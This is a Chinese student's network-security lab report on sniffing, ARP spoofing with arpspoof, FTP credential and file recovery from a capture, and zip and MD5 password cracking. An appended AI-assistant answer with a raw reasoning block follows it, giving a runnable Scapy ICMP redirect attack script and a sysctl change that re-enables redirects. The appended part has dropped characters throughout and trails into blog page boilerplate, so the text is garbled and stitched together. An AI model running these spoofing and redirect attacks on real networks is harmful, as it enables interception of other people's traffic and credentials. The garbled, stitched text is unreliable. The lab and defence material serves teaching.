网安实验二


工具

  • wireshark

  • Burpsuit

  • ARCHPR

  • Arpspoof

  • 实验环境: Kali虚拟机 Windows

  • 网络连接方式:桥接 可按这里进行配置


一、网络嗅探

在这里插入图片描述

A主机上外网,B运行sinffer(Wireshark)选定只抓源为A的数据)。

A为物理机,B为虚拟机

1.1 写出以上过滤语句

我们可以只抓 ip.src为A的语句

ip.src == 10.21.121.25

在这里插入图片描述

1.2 B是否能看到A和外网的通信(A刚输入的帐户和口令)?为什么?

B不能看到A和外网的通信,A的数据包会直接发给网关,不经过B,无法嗅探到。

Arp欺骗原理:

ARP协议是有缺点的,第三方主机可以构造一个ARP欺骗报文,而源主机却无法分辨真假。如果发送者硬件地址字段填入攻击者的硬件地址,而发送者IP地址填入被假冒者的IP地址,那么就构造出了一个用于欺骗的ARP请求报文。那么被欺骗主机的ARP高速缓存,被假冒者的IP地址与其MAC地址的对应关系就会更改为欺骗者的,从而达到ARP欺骗的目的。特别的,如果攻击者冒充网关,将转发子网内到外网的所有通信量,以达到捕获其他主机的通信量,从而破坏数据传输的保密性。

2.1 为了捕获A到外网的数据,B实施ARP欺骗攻击,B将冒充该子网的什么实体?

B冒充的是网关。

2.2 写出arpspoof命令格式

arpspoof -i eth0 -t 目标主机 目标网关
echo 1 >> /proc/sys/net/ipv4/ip_forward //开启数据转发

在这里插入图片描述
这样就欺骗成功了,被添加进了arp中。

2.3 B是否能看到A和外网的通信(A刚输入的帐户和口令)?

可以看到,B在进行arp欺骗之后,A会把B看作网关。A的数据包会发送给B,再由B发给网关,如果数据包里有账户和口令是可以看的到的。

2.4在互联网上找到任意一个以明文方式传递用户帐号、密码的网站,截图Wireshark中显示的明文信息

在这里插入图片描述在这里插入图片描述

3 FTP数据还原部分:利用WireShark打开实验实验数据data.pcapng

3.1 FTP服务器的IP地址是多少?你是如何发现其为FTP服务器的?

在这里插入图片描述

FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。
默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控制信息。但是,是否使用20作为传输数据的端口与FTP使用的传输模式有关,如果采用主动模式,那么数据传输端口就是20;如果采用被动模式,则具体最终使用哪个端口要服务器端和客户端协商决定。

从这个数据包中可看出
192.168.182.132请求了192.168.182.1
192.168.182.1响应了192.168.182.132
所以192.168.182.1是FTP服务器

3.2 客户端登录FTP服务器的账号和密码分别是什么?

这就需要查看请求FTP服务器的数据包

wireshark命令
ip.src == 192.168.182.132 and ftp

在这里插入图片描述

3.3 客户端从FTP下载或查看了2个文件,一个为ZIP文件,一个为TXT文件,文件名分别是什么?

在这里插入图片描述

3.4 数据的还原

ftp数据包分为两个部分,一部分是请求,另一部分是数据的传输。所以需要找到ftp的数据

ftp-data

1. zip文件的恢复

在这里插入图片描述
tcp追踪流,保留原始数据为zip格式

在这里插入图片描述用ARCHPR工具暴力破解开,里面是一个可爱的企鹅 (●’◡’●)

在这里插入图片描述
在这里插入图片描述

2. txt文件

同样的方法再来一遍
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

当然你也可以选择其他的方法来进行,比如:zip的文件头是504b,根据这个特点,可进行数据包中的字符串搜索。

二、暴力破解

1.1 网站密码破解

在这里插入图片描述在这里插入图片描述

1.2 MD5破解

SqlMap得到某数据库用户表信息,用户口令的MD5值为7282C5050CFE7DF5E09A33CA456B94AE
在这里插入图片描述
老师真的喜欢土豆。。。

1.3 John the Ripper的作用是什么?

John theRipper免费的开源软件,是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如DES、MD4、MD5等。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。
John the
ripper是一款基于字典的免费的密码破解工具。简单来说就是进行暴力密码破解,这种密码破解方式,耗费时间长、耗费处理器资源多。尝试的密码越多,所需的时间就越长。


思考

1、 谈谈如何防止ARP攻击。

  1. 双绑是在路由器和终端上都进行IP-MAC绑定的措施,它可以对ARP欺骗的两边,伪造网关和截获数据,都具有约束的作用。
  2. 在一些杀毒软件中加入了ARP个人防火墙的功能,它是通过在终端电脑上对网关进行绑定,保证不受网络中假网关的影响,从而保护自身数据不被窃取的措施。
  3. 通过划分VLAN和交换机端口绑定,以图防范ARP,也是常用的防范方法。做法是细致地划分VLAN,减小广播域的范围,使ARP在小范围内起作用,而不至于发生大面积影响。同时,一些网管交换机具有MAC地址学习的功能,学习完成后,再关闭这个功能,就可以把对应的MAC和端口进行绑定,避免了病毒利用ARP攻击篡改自身地址。也就是说,把ARP攻击中被截获数据的风险解除了
  4. 网络下面给每一个用户分配一个帐号、密码,上网时必须通过PPPoE认证,这种方法也是防范ARP措施的一种。PPPoE拨号方式对封包进行了二次封装,使其具备了不受ARP欺骗影响的使用效果(咱们学校用的这种方法 = =)
  5. 参考链接:https://www.jianshu.com/p/c04c76e2fe96

2、 安全的密码(口令)应遵循的原则

  1. 不要选择弱口令,比如纯数字,简短的字母等
  2. 尽量不要选择自身信息作为密码
  3. 密码长度要长一点,最好加入特殊字符作为密码

3、 谈谈字典攻击中字典的重要性。

  1. 对一些弱口令进行快速的爆破
  2. 在对目标进行信息收集之后,构建字典可以增加爆破成功的机率,快速拿到信息。

总结

这次实验相比较前一次来说操作起来比较简单,但还是了解到了FTP协议,ARP欺骗,密码的爆破。这些都是可以在生活中实践且易上手的东西,可以假期去自己家里试试(●’◡’●)

<think>好的,我需要帮助用户了解如何设置和执行ICMP重定向攻击实验。首先,我得回忆一下ICMP重定向的基本概念。根据引用[3],ICMP重定向攻击是通过伪造ICMP重定向消息,让目标主机更改路由表,从而将流量导向攻击者的设备。接下来,用户需要具体的实验步骤和模拟环境配置。 首先,实验环境搭建是关键。用户可能需要使用虚拟机来模拟络环境,比如用VMware或VirtualBox。这里需要至少三台机器:攻击者、受害者和合法关。Kali Linux适合作为攻击者机器,因为它自带很多工具,而其他Linux发行版可以作为受害者和关。 然后是络配置部分。要确保所有设备在同一子内,比如192.168.1.0/24,这样它们可以直接通信。需要检查受害主机的路由表,确认默认关是否正确,这是后续攻击能否成功的前提。 接下来是工具准备。Scapy是一个强大的Python库,可以用来构造和发送伪造的ICMP数据包。用户需要装Scapy,并确保有足够的权限,比如使用sudo。 构造ICMP重定向包时,需要注意源IP地址要伪装成合法关的地址,目标地址是受害者。ICMP类型应该是重定向消息(类型5),代码可能需要根据情况选择,比如代码1表示主机重定向。新的关地址应该是攻击者的IP,这样受害者的流量就会被重定向到攻击者那里。 在发送伪造的数据包后,需要验证攻击是否成功。可以检查受害主机的路由表是否有变化,或者尝试从受害者ping其他地址,看流量是否经过攻击者的机器。如果成功,攻击者可以使用Wireshark等工具捕获流量,甚至进行中间人攻击。 用户可能遇到的问题包括络配置错误、权限不足或者系统禁用了ICMP重定向功能。例如,现代操作系统默认可能忽略ICMP重定向,所以需要检查sysctl配置,确保net.ipv4.conf.all.accept_redirects设置为1。 此外,用户可能对实验的合法性和全性有疑问,需要提醒他们仅在授权环境下进行,避免法律风险。最后,可以建议结合其他全措施,如防火墙或入侵检测系统,来防范此类攻击,呼应引用[1]中的内容。 总结下来,步骤分为环境搭建、络配置、工具使用、构造攻击包、执行攻击和验证结果。需要详细说明每一步的操作,并指出可能的问题和解决方法,确保用户能够顺利完成实验。</think>### ICMP重定向攻击实验配置与操作指南 --- #### 一、实验原理 ICMP重定向攻击通过伪造ICMP类型5(重定向)消息,诱导目标主机修改其路由表,使流量经过攻击者控制的设备[^3]。攻击者需伪造合法关的IP地址,发送虚假路由更新信息。 --- #### 实验环境搭建 1. **模拟工具** - 虚拟机软件:VMware/VirtualBox - 操作系统:Kali Linux(攻击机)、Ubuntu/CentOS(受害主机及合法关) 2. **络拓扑** - 攻击者(Attacker):IP `192.168.1.10` - 受害者(Victim):IP `192.168.1.20` - 合法关(Gateway):IP `192.168.1.1` - 确保所有设备在同一子(如`192.168.1.0/24`) --- #### 三、实验步骤 ##### 1. 配置受害主机路由表 - **查看当前路由** ```bash route -n # 确认默认关为合法关(192.168.1.1) ``` ##### 2. 攻击者准备工具 - **装Scapy(Python包)** ```bash sudo apt-get install python3-scapy ``` ##### 3. 构造伪造ICMP重定向包 - **使用Scapy编写攻击脚本** ```python from scapy.all import * # 构造IP层 ip = IP(src="192.168.1.1", dst="192.168.1.20") # 伪造关IP # 构造ICMP重定向包 icmp = ICMP(type=5, code=1, gw="192.168.1.10") # 类型5为重定向,gw指向攻击者IP # 构造原始IP包(诱使受害者修改路由) original_pkt = IP(src="192.168.1.20", dst="8.8.8.8")/ICMP() # 假设受害者尝试访问外部地址 # 发送组合包 send(ip/icmp/original_pkt, verbose=0) ``` ##### 4. 执行攻击 - **持续发送伪造包** ```python while True: send(ip/icmp/original_pkt, inter=0.1) # 每0.1秒发送一次 ``` ##### 5. 验证攻击效果 - **检查受害主机路由表** ```bash route -n # 观察默认关是否变为攻击者IP(192.168.1.10) ``` - **流量捕获验证** 在攻击者机器运行Wireshark,过滤ICMP流量: ```bash icmp.type == 5 # 确认重定向包被接收 ``` --- #### 四、关键问题与注意事项 1. **系统防御机制** 现代操作系统可能默认忽略ICMP重定向(需检查配置): ```bash sysctl net.ipv4.conf.all.accept_redirects # 若为0,需临时设置为1 sudo sysctl -w net.ipv4.conf.all.accept_redirects=1 ``` 2. **实验合法性** - 仅在隔离实验室环境操作,避免干扰真实络[^1][^3] - 结合防火墙规则限制攻击范围 3. **增强攻击效果** - 配合ARP欺骗(如arpspoof)强制流量经过攻击者 - 使用中间人工具(如Ettercap)分析篡改数据 --- ####
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值